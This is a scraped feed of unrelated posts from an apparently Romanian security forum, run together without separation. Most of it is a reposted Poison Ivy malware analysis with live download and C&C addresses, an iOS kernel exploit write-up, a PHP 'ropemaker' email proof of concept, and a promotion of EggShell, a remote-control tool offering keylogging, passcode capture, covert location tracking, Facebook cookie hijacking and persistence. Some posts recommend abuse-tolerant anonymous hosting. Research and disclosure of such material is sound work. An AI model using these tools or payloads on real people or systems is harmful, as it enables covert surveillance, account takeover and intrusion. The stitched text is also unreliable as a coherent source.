Leaderboard

https://www.it-sec-catalog.info/ Available from https://it-sec-catalog.info/ and https://www.gitbook.com/book/arthurgerkis/it-sec-catalog. About this project This is a catalog of links to articles on computer security — software and hardware analysis and vulnerability exploitation, shellcode development and security mitigations, including computer security research, and malware stuff. Slides are not included (there is other project for that). Advisories without much details are also not included. All articles are only in English. Project is running since 2010. Author and contributors Author of this project: Arthur (ax330d) Gerkis, contributors: Nitay Artenstein, Joe (j0echip) Chip. Thanks to everyone who helped with the project.

Pune mai multe informatii pe site, ce tip de reclame vinzi popup, bannere (+dimensiuni), de ce ar trebui sa folosim site-ul tau (gen: platim foarte rapid, modalitatile de plata), privacy policy pe prima pagina in footer ( vezi internal links), spune pe prima pagina ca revshare-ul e de 90%. + textul pe care il ai acum pare copiat. Parerea mea: esti retea care vinde reclame dar care nu stie sa se vanda

DeLux Edition: Getting root privileges on the eLux Thin Client OS Designed as a secure, streamlined environment for users to access applications such as a browser, Citrix and terminal services, the vendor describes eLux as: “… a hardware-independent operating system for cloud computing environments. It is based on a write protected file system and therefore secure against computer viruses and other malware without using special Antivirus Software. eLux® has been continuously developed and enhanced for more than 15 years." Source: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/delux-edition-getting-root-privileges-on-the-elux-thin-client-os/

M-am jucat în ultimele ore cu ropemaker şi pot să zic că nu este cine ştie ce. POC: <?php $to = "destinatar@site.tld"; $subject = "ropemaker vulnerability"; $message =<<<START <html> <head> <style type="text/css">@import "http://link_catre_extern/style.css"</style> </head> <body> I heard you are a <span id="content"></span> boy </body> </html> START; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-Transfer-Encoding: quoted-printable\r\nContent-Type: text/html; charset=UTF-8\r\n"; mail($to,$subject,$message,$headers); În fişierul CSS avem aşa: #content:after { content:"good"; } După trimiterea mailului, se poate modifica fişierul css pentru a adăuga altceva (ex. bad). Din punctul meu de vedere, vulnerabilitatea este doar o problemă la nivelul programatorilor care au creat aplicaţiile şi nu ştiu să baneze importul de fişiere CSS din extern. Sunt foarte puţine aplicaţii care nu blochează spreadsheet-urile (vulnerabilitatea mi-a mers doar pe Outlook pe Android), deci, într-o lună, două, ar trebui să avem update-uri de securitate pe ele şi ropemaker să fie de domeniul trecutului.

My little sister's phone got stolen/lost a week ago. Yesterday, I got a strange text. Today, I peaked! (source) 6 days My little sister who is going to be a senior worked hard all summer to buy an iPhone, only to have it stolen (or fall out, she is still not entirely sure) out of her boyfriends car a week ago. She had not activated the find my iphone app so we reported it stolen but were pretty sure someone was just being gifted a free iphone courtesy of my sister's summer wages. On top of that, she had also bought a wallet case and lost all her ID's and cards as well. So yesterday I get this text from a strange number. I give my sister a quick call to make sure it is not her and effectively realize someone is fishing through her contacts or documents to get her password. I am well aware after the WTH that his is not my sister BTW. I was bored so I say to myself, why not have some fun. We will never get the phone back, but what the heck, might as well kill some time. I am certain that his or her insistence will at the very least make this an lengthy exchange. I'm convinced this person is humoring me and just stringing me along until I cave. No one can be buying this! .... Again, I am thinking, he is humoring me but I was like, let's see how long this lasts until he stops texting me back. AVERY FTW!!!! My sister got an email this morning. I have peaked! Behold! Sursa: https://imgur.com/r/funny/USjnb Nu stiu daca e real, dar e interesanta ideea.

Web Development Limbaje WEB: PHP, Javascript Design: Bootstrap Template engine: Smarty Editare/Fixare/Optimizare: Wordpress Framework pentru scrapere: Simple HTML Dom Informatii -Accept proiecte de lunga durata cat si cele de scurta durata. -La orice proiect or sa se stabileasca toate detaliile la inceput cu clientul, nu se pot aduce new features pe durata proiectului.(Decat mici modificari) -Support-ul este FREE in totalitate. Prin support ma refer: instalare, fixare buguri, fixare MySQL, etc. -Preturile or sa fie stabilite in functie de timpul necesar proiectului si complexitatea sa. -Accept si job-uri unde primesc salariu lunar. -Accept si job-uri in care sunt platit pe ora. Portofoliu: -Ofer live preview la proiecte in privat sau prin TeamViewer(Nu am voie sa las link-ul companiilor dar pot arata poze.) Plata -BitCoin/Etherum -PayPal -Transfer Bancar -Paysafe Contact -ICQ: MOMENTANT NEDISPONIBIL -Telegram: @adicode -Skype: adicode32@outlook.com -Jabber: adicode@404.city **Nu lasa-ti mesaje gen "ti-am dat add", "cat m-ar costa?", "poti face asta?" in topic, va rog frumos. Astept orice intrebare in PM sau pe una din retelele de mai sus. Multumesc.

o noua vulnerabilitate in ceea ce priveste WPS POC

Merci ca m-ai anuntat, intra milionul de mailuri

In general raspund in maxim o luna. Lasa aici nr de tel si ti-l sparge cineva.

e foarte ok pustiul si preturile sunt rezonavile.

Da, e foarte detaliat, recomand.

Merge si pe gmail dar nu cu parametrii css

Se pare ca nu prea poti aburi pe nimeni, nene. Asta nu e forum de infractori.

./ban

Jeg. Sper sa se tavaleasca in chinuri. @aelius - respectivii se pare ca nu sunt interesati, arde-l pe jegos.

Deep Analysis of New Poison Ivy Variant by Xiaopeng Zhang | Aug 23, 2017 | Filed in: Security Research Recently, the FortiGuard Labs research team observed that a new variant of Poison Ivy was being spread through a compromised PowerPoint file. We captured a PowerPoint file named Payment_Advice.ppsx, which is in OOXML format. Once the victim opens this file using the MS PowerPoint program, the malicious code contained in the file is executed. It downloads the Poison Ivy malware onto the victim’s computer and then launches it. In this blog, I’ll show the details of how this happens, what techniques are used by this malware, as well as what it does to the victim’s computer. The PowerPoint Sample Figure 1 shows a screenshot of when the ppsx file is opened. Figure 1. Open Payment_Advice.ppsx As you can see, the ppsx file is played automatically. The “ppsx” extension stands for “PowerPoint Show,” which opens the file in presentation mode. This allows the malicious code to be executed automatically. The warning message box alerts the user that it might run an unsafe external program. Usually, the implied content of the document beguiles the user into pressing the Enable button. Let’s take a look at the malicious code embedded inside this PowerPoint file. OOXML file is a zip format file. By decompressing this file we can see the file/folder structure, shown below. Figure 2. PPSX file structure Going into its .\ppt\slides\ subfolder, slide1.xml is the slide automatically shown in Figure 1. The file “.\_rels\slide1.xml.rels” is the relationship file where the resources used in slide1.xml are defined. In slide1.xml, I found the xml code: . This means that when the user's mouse hovers over this element, something named “rId2” in slide1.xml.rels file is executed. Figure 3 shows the relationship between them. Figure 3. The code defined in “rId2” Being Added into the Startup Group The code defined in “rId2” uses an echo command of cmd.exe to output vbs codes into the Thumbs.vbs file in the “Startup” folder of the Start menu. This allows the Thumbs.vbs file to be executed when the victim’s system starts. We’ll take a look at the content of this Thumb.vbs file below. Figure 4. Thumb.vbs in the Startup folder and its content The Downloaded File Thumbs.vbs downloads a file from hxxp://203.248.116.182/images/Thumbs.bmp and runs it using msiexec.exe. As you may know, msiexec.exe is the Microsoft Windows Installer program, which is the default handler of .MSI files. Msiexec.exe can be used to install/uninstall/update software on Windows. The MSI file is an Installer Package. It contains a PE file (in a stream) that is executed when it’s loaded by msiexec.exe. This PE file could be replaced with malware to bypass any AV software detection. We have also observed that more and more malware authors have started using this method to run their malware. The MSI file is in the Microsoft OLE Compound File format. In Figure 5 we can see the downloaded Thumbs.bmp file content in the DocFile Viewer. Figure 5. The downloaded Thumb.bmp in DocFile viewer Next, I’m going to extract this PE file from the stream into a file (exported_thumbs). By checking with a PE analysis tool, we can see that it’s a 64-bit .Net program. This means that this malware only afftects 64bit Windows. Analyzing the .Net code and Running It After putting this extracted file into dnSpy to be analyzed, we can see the entry function Main(), as shown in Figure 6. Figure 6. Main function It then calls the rGHDcvkN.Exec() function in Main(), which contains a huge array. Actually, the data in the array is the code that is executed as a thread function by a newly-created thread. Figure 7 clearly shows how the code in the array is executed. Figure 7. .Net program runs a thread to execute the code in a huge array If the code is run on a 64-bit platform, IntPtr.Size is 8. So the huge array is passed to array3. It then allocates memory buffer by calling rGHDcvkN.VirtualAlloc() and copies the code from array3 into the new memory by calling Marshal.Copy(). It eventually calls rGHDcvkN.CreateThread() to run the code up. I started the .Net program in the debugger, and set a breakpoint on CreateThread API to see what the array code would do when it’s hit. Per my analysis of the array code, it is a kind of loader. Its main purpose is to dynamically load the main part of the malware code from the memory space into a newly-allocated memory buffer. It then repairs any relocation issues according to the new base address and repairs APIs’ offset for the main part code. Finally, the main code’s entry function is called. Anti-Analysis Techniques All APIs are hidden. They are restored when being called. The snippet below is the hidden CreateRemoteThread call. sub_1B0E6122 proc near mov rax, 0FFFFFFFF88E23B10h neg rax jmp rax ;; CreateRemoteThread sub_1B0E6122 endp All strings are encrypted. They are decrypted before using. For example, this is the encrypted “ntdll” string. unk_1AFD538C db 54h, 0B2h, 9Bh, 0F1h, 47h, 0Ch ; ==> "ntdll" It runs a thread (I named it ThreadFun6) to check if the API has been set as a breakpoint. If yes, it calls TerminateProcess in another thread to exit the process immediately. The thread function checks all APIs in the following modules: “ntdll”, “kernel32”, “kernelbase” and “user32”. In Figure 8, you can see how this works: Figure 8. Checking for breakpoints on exported APIs in “ntdll” It runs a thread to check if any analysis tools are running. It does this by creating specially named pipes that are created by some analysis tools. For example, “\\.\Regmon” for registry monitor tool RegMon; “\\.\FileMon” for local file monitor tool FileMon; “\\.\NTICE” for SoftIce, so on. If one of the named pipes cannot be created, it means one of the analysis tools is running. It then exits process soon thereafter. It then goes through all the running program windows to check if any windows class name contains a special string to determine if an analysis tool is running. For example, “WinDbgFrameClass” is Windbg main window’s class name. This check runs in a thread as well (I named it as Threadfun3). Below, Figure 9 shows how this thread function works. Figure 9. Check Windows’ Class Name By checking to see if the “Wireshark-is-running-{…}” named mutex object exists (by calling OpenMutex), it could implement anti-WireShark. By calling the API “IsDebuggerPresent”, it can check to see ] if this process is running in a debugger (returns with 1). It’s a kind of anti-debugging check. It also checks how much time is spent by calling IsDebuggerPresent. If the time is more than 1000ms, it means that the process runs in a debugger or VM, and it then exits the process. These are all the ways that this malware performs anti-analysis. Most of these checks run in their own threads, and are called every second. It then exits the process if any check is matched. To continue the analysis of this malware, we have to first skip these checks. We can dynamically modify its code to do so. For example, changing “IsDebuggerPresent”’s return value as 0 allows us to bypass the running-in-debugger detection. Generating A Magic String from a Decrypted String By decrypting three strings and putting them together, we get the magic string "Poison Ivy C++", which will be saved in a global variable qword_1B0E4A10. From the code snippet below you can see how it makes this string. Figure 10. Generating the magic string Hiding Key-functions in Six Different Modules It next loads several modules from its encrypted data. It creates a doubly-linked list, which is used to save and manage these loaded modules. There are many export functions from each of these modules that achieve the malware’s main work. In this way, it’s also a challenge for dynamic debugging. The variable qword_1AFE45D0 saves the header of that doubly-linked list. Each object in the list has the structure below: +00H pointer to previous object in the list +08H pointer to next object in the list +18H for Critical Section object use +28H the base address of the module this object is related to +30H pointer to export function table It then decrypts and decompresses six modules one by one, and adds each of them into the doubly-linked list. Figure 11 shows a code snippet from decrypting these six modules. Figure 11. Decrypting and decompressing modules Each module has an Initialization function (like DllMain function for Dll files) that is called once the module is completely decrypted and decompressed. Three of these modules have an anti-analysis ability similar to the one I described in the Anti-Analysis section above. So to continue the analysis of this malware, I needed to modify their codes to bypass their detection function. After that it calls the export functions of those modules. It decrypts the configuration data from the buffer at unk_1AFE3DA0. This configuration data is decrypted many times during the process running, and it tells the malware how to work. I’ll talk more about the configuration data in a later section. The malware then picks a string from the configuration data, which is “%windir%\system32\svchost.exe”. It later calls CreatProcess to run svchost.exe, and then injects some code and data from malware memory into the newly-created svchost.exe. It finally calls the injected code and exits its current process. The malware’s further work is now done in the svchost.exe side. Starting over in SVCHOST.exe Through my analysis I could see that the injected codes and data represent the entire malware. It all starts over again in the svchost.exe process. Everything I have reviewed about is repeated in svchost.exe. For example, executing the anti-analysis detection code, getting the magic string, creating a doubly-linked list, decrypting six modules and adding them into the doubly-linked list, and so on. It then goes to different code branch when executing the instruction 01736C2 cmp dword ptr [rdi+0Ch], 1 in module2. [rdi+0ch] is a flag that was passed when the entire code was initialized. When the flag is 0, it takes the code branch to run svchost.exe and inject code in it; when it’s 1, it takes the code branch to connect to the C&C server. Before the injected code in svchost.exe is executed, the flag is set to 1. Figure 12 shows the code branches. Figure 12. Snippet of code branches Obtaining the C&C Server from PasteBin The C&C server’s IP addresses and ports are encrypted and saved on the PasteBin website. PasteBin is a text code sharing website. A registered user can paste text code on it in order to share the text content to everyone. The malware author created 4 such pages, and put the C&C server IP addresses and ports there. Do you remember when I talked previously about encrypted configuration data? It contains the 4 PasteBin URLs. They are hxxps://pastebin.com/Xhpmhhuy hxxps://pastebin.com/m3TPwxQs hxxps://pastebin.com/D8A2azM8 hxxps://pastebin.com/KQAxvdvJ Figure 13 shows the decrypted configuration data. Figure 13. Decrypted configuration data If you access any one of these URLs, you will find there are normal Python codes on it. The encrypted server IP address and port are hidden in the normal python code. Let’s take a look. While looking at the main function you will find the code below: win32serviceutil.HandleCommandLine({65YbRI+gEtvlZpo0qw6CrNdWDoev}), the data between “{“ and “}”, is the encrypted IP address and port. See Figure 14 for more information. Figure 14. Encrypted C&C IP address and Port on PasteBin Let’s see what we can see after decryption in Figure 15. Figure 15. Decrypted IP address and Port From Figure 15, we can determine that the decrypted C&C server IP address is 172.104.100.53 and the Port is 1BBH i.e. 443. It should be noted that the IP addresses and Ports on the four pages are not the same. The author of this malware can update these IP addresses and Ports by simply updating the python codes on the four PasteBin pages. Communicating with the C&C server The malware starts connecting and sending data to its C&C server once it gets the IP address and Port. All the packets traveling between the malware and its server are encrypted using a private algorithm. The structure of the packet is like this: (the first 14H bytes is the header part, from 14H on is the data part) +00 4 bytes are a key for encryption or decryption. +04 4 byte, are the packet command. +0c 4 bytes is the length in bytes of the data portion of the packet. +14 4 bytes. From this point on is the real data. Once the malware has connected to the server, it first sends a “30001” command, and the server replies with command “30003”. The command “30003” requests the client to collect the victim’s system information. Once the malware receives this command, it calls tons of APIs to collect the system information. It gathers the system's current usage of both physical and virtual memory by calling GlobalmemoryStatusEx. It gets the CPU speed from the system registry from “HKLM\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0\~MHz". It gets the free disk space of all partitions by calling GetDiskFreeSpaceExA. It gets the CPU architecture by calling GetNativeSysstemInfo. It collects display settings by calling EnumDisplaySetting. It collects file information from kernel32.dll. It gets the current computer name and user name by calling GetComputerName and GetUserName. It also gets the System time by calling GetSystemTime, and the system version by calling GetVersionEx. Finally, it copies the svchost.exe’s full path and a constant string, “PasteBin83”, which is from the decrypted configuration data (see Figure 13 again). In Figure 16 you can see the collected system information before encryption. Figure 17 shows the data after encryption as it’s about to be sent to the C&C server. The first four bytes are used to encrypt or decrypt the following data. Figure 16. Collected information from the victim’s system Figure 17. Encrypted system information from victim’s system From my analysis during the malware runtime, I could determine that the malware keeps obtaining the C&C server’s IP address from PasteBin and communicating with the C&C server in an infinite loop (by calling Sleep(1000) to suspend the execution). So far, I only saw that the commands “030001” and “030003” are used. I’ll continue to monitor and analyze the malware’s behavior to see what else it will do. Solution The FortiGuard Antivirus service has detected the files "Payment_Advice.ppsx" as MSOFFICE/PoisonIvy.A!tr.dldr and "Thumbs.bmp" as MSOFFICE/PoisonIvy.A!tr. IOC URL: hxxp://203.248.116.182/images/Thumbs.bmp Sample SHA-256 hashes: Payment_Advice.ppsx E7931270A89035125E6E6655C04FEE00798C4C2D15846947E41DF6BBA36C75AE Thumbs.bmp A3E8ECF21D2A8046D385160CA7E291390E3C962A7107B06D338C357002D2C2D9 by Xiaopeng Zhang | Aug 23, 2017 | Filed in: Security Research Sursa: https://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant

ziVA: Zimperium’s iOS Video Audio Kernel Exploit Adam Donenfeld Aug 23 2017 Following my previous post, I’m releasing ziVA: a fully chained iOS kernel exploit that (should) work on all the iOS devices running iOS 10.3.1 or earlier. The exploit itself consists of multiple vulnerabilities that were discovered all in the same module: AppleAVEDriver. The exploit will be covered in depth in my HITBGSEC talk held on August 25th. For those of you who are not interested in iOS research and would like to protect themselves against these vulnerabilities, we urge you to update your iOS device to the latest version. Without an advanced mobile security and mitigation solution on the device (such as Zimperium zIPS), there’s little chance a user would notice any malicious or abnormal activity. The POC is released for educational purposes and evaluation by IT Administrators and Pentesters alike, and should not be used in any unintended way. The CVEs explanations, as written by Apple, can be found here. iOS vulnerabilities discovered and reported to Apple AVEVideoEncoder Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to gain kernel privileges Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-6989: Adam Donenfeld (@doadam) of the Zimperium zLabs Team CVE-2017-6994: Adam Donenfeld (@doadam) of the Zimperium zLabs Team CVE-2017-6995: Adam Donenfeld (@doadam) of the Zimperium zLabs Team CVE-2017-6996: Adam Donenfeld (@doadam) of the Zimperium zLabs Team CVE-2017-6997: Adam Donenfeld (@doadam) of the Zimperium zLabs Team CVE-2017-6998: Adam Donenfeld (@doadam) of the Zimperium zLabs Team CVE-2017-6999: Adam Donenfeld (@doadam) of the Zimperium zLabs Team IOSurface Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to gain kernel privileges Description: A race condition was addressed through improved locking. CVE-2017-6979: Adam Donenfeld (@doadam) of the Zimperium zLabs Team I will provide an in depth analysis of the vulnerabilities and exploitation techniques at HITBGSEC. After the conference, I will publish the rest of the disclosures as well as my slides and whitepaper. A brief description of one of the vulnerabilities, CVE-2017-6979: The function IOSurfaceRoot::createSurface is responsible for the creation of the IOSurface object. It receives an OSDictionary, which it forwards to the function IOSurface::init. IOSurface::init parses the properties and in case one of these are invalid (e.g, a width that exceeds 32 bits), returns 0, and the creation of the IOSurface is halted. The IOSurfaceRoot object must hold a lock while calling IOSurface::init because IOSurface::init adds the IOSurface object to the IOSurfaceRoot’s list of surfaces. Here’s the code that used to call IOSurface::init before Apple’s fix: surface = (IOSurface *)OSMetaClass::allocClassWithName(“IOSurface”); IORecursiveLockLock(provider->iosurface_array_lock); if ( !surface ) { IORecursiveLockUnlock(provider->iosurface_array_lock); return 0; } init_ret_code = surface->init(surface, provider, task_owner, surface_data); /* At this point, the surfaces’ list is unlocked, and an invalid IOSurface object is in the list */ IORecursiveLockUnlock(provider->iosurface_array_lock);if ( !init_ret_code ) { surface->release(surface); return 0; } In case the IOSurface::init function fails, IORecursiveLockUnlock will be called. A bogus IOSurface object will still be in the system and in the IOSurfaceRoot’s list of surfaces (thus accessible to everyone). At this particular moment, an attacker can increase the refcount of the IOSurface (creating, for instance, an IOSurfaceSendRight object attached to the surface) and prevent the bogus IOSurface object from being destroyed. This leads to the creation and existence of an IOSurface in the kernel which the attacker controls its properties (IOSurface->width = -1 for example). Such an IOSurface object can be given to other mechanisms in the kernel which might rely on a valid width/height/one of the properties to work, thus causing heap overflows/other problems that might lead to an elevation of privileges by the attacker. Our proposed solution to Apple was to call IOSurface::release while the lock provider->iosurface_array_lock is still held. Therefore moving the IORecursiveLockUnlock call just below IOSurface::release and putting it after the entire if statement would fix the problem because the IOSurfaceRoot’s list of surfaces will only be available once the bogus IOSurface is already cleaned up. Further reverse engineering of the function reveals that Apple changed the code according to our suggestions: surface = (IOSurface *)OSMetaClass::allocClassWithName(“IOSurface”); IORecursiveLockLock(provider->iosurface_array_lock); if ( !surface ) { IORecursiveLockUnlock(provider->iosurface_array_lock); return 0; } init_ret_code = surface->init(surface, provider, task_owner, surface_data);if ( !init_ret_code ) { surface->release(surface); /* Here our bad surface is freed *before* the kernel unlocks the surfaces’ list, Hence our bad surface is not accessible at anytime in case IOSurface::init fails. */ IORecursiveLockUnlock(provider->iosurface_array_lock); return 0; } IORecursiveLockUnlock(provider->iosurface_array_lock); The issues are severe and could lead to a full device compromise. The vulnerabilities ultimately lead to an attacker with initial code execution to fully control any iOS device on the market prior to version 10.3.2. Fortunately, we responsibly disclosed these bugs to Apple and a proper fix was coordinated. iOS users that update their device to the latest iOS version should be protected. We discovered more vulnerabilities, and the written exploit POC didn’t take advantage of CVE-2017-6979! The vulnerabilities used for the POC will be covered in depth. We plan to release the security advisories as we sent them to Apple right after my talk at HITBGSEC Zimperium’s patented machine-learning technology, z9, detects the exploitation of this vulnerability. We recommend to strengthen iOS security using a solution like Zimperium zIPS. Powered by z9, zIPS offers protection against known and unknown threats targeting Apple iOS and Google Android devices. z9 has detected every discovered exploit over the last five years without requiring updates. The exploit source code is available here. Disclosure timeline: 24/01/2017 – First Bug discovered 20/03/2017 – Shared bugs with Apple 29/03/2017 – Apple confirmed the bugs 15/05/2017 – Apple distributed patches I would like to thank Apple for their quick and professional response, Zuk Avraham (@ihackbanme) and Yaniv Karta (@shokoluv) that helped in the process. Sursa: https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/

Brief Overview EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploits “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload what spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES Encrypted Communication All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started. Getting Started To use EggShell, you must have pycrypto and Python 2.7.x installed Install using git: (macOS/Linux) git clone https://github.com/neoneggplant/EggShell cd EggShell python eggshell.py Create And Run A Payload Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary. Example: running the created payload on our target Back on our server, we can see we received a connection and an eggshell session has been started! macOS Commands ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file picture : take picture through iSight camera getpid : get process id openurl : open url through the default browser idletime : get the amount of time since the keyboard/cursor were touched getpaste : get pasteboard contents mic : record microphone brightness : adjust screen brightness exec : execute command persistence : attempts to connect back every 60 seconds rmpersistence : removes persistence iOS Commands sysinfo : get system information ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file frontcam : take picture through front camera backcam : take picture through back camera mic : record microphone getpid : get process id vibrate : make device vibrate alert : make alert show up on device say : make device speak locate : get device location respring : respring device setvol : set mediaplayer volume getvol : view mediaplayer volume isplaying : view mediaplayer info openurl : open url on device dial : dial number on device battery : get battery level listapps : list bundle identifiers open : open app persistence : installs LaunchDaemon – tries to connect every 30 seconds rmpersistence : uninstalls LaunchDaemon installpro : installs eggshellpro to device EggShellPro Commands (Cydia Substrate Extension) lock : simulate lock button press wake : wake device from sleeping state home : simulate home button press doublehome : simulate home button double press play : plays music pause : pause music next : next track prev : previous track getpasscode : log successfull passcode attempts unlock : unlock with passcode keylog : log keystrokes keylogclear : clear keylog data locationservice: turn on or off location services EggShell Pro EggShell Pro is a Cydia substrate library that takes advantage of the the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring. Navigating/Downloading Files EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine. Taking Pictures Taking a photo with the “picture” command on macOS will active the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam” iOS Location Tracking Even With Location Services Off EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps. iOS Getting Passcode EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device. macOS Hijacking Safari Facebook Sessions With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser. macOS Persistence To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab. Recording Audio Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data. Handling Multiple Sessions With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices. As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console Payloads In Apps Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS Immediately after running the app, our payload is run and just as expected, we have a connection Safari Exploit + EggShell Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro Original Video Thanks For Viewing lucasjackson5815@gmail.com Download: EggShell-master.zip Source: http://lucasjackson.me/index.php/eggshell/

Magnificent app which corrects your previous console command https://github.com/nvbn/thefuck

la mama in podul casei, prin hambar ....

Depinde ce vrei sa faci. Sunt dedicate si vps-uri in Iran cu plata bitcoin, trafic routat prin Rusia si la T&Cs au interzis doar DDoS, malware, spam si child porn.

Anonymous domain registration: https://njal.la/ pentru domenii, altii: http://www.gandi.net http://nic.ru http://prq.se Hosting: https://masterhost.ru/ http://abusehosting.net/ http://www.2x4.ru/index.php https://www.shinjiru.com/ https://sweb.ru/ http://zservers.ru/ https://jino.ru/ Recomand sollhost: Sales Jabber: webhost@jabberim.org hostmgr@pubchat.im Jabber: sollhost@jabbix.ru o lectura interesanta: https://www.informatics.indiana.edu/xw7/papers/alrwais2017under.pdf

Salutare, Daca sunteti interesati de Retelistica va invit sa urmariti aceste tutoriale si sa aplicati conceptele prin laboratoarele incluse [1] https://www.youtube.com/channel/UCVJZsdei_i2G3ZimBzqcmeg [2] https://ramonnastase.ro Spor la treaba !

Ce s-a intamplat?Nu e bun contul lui?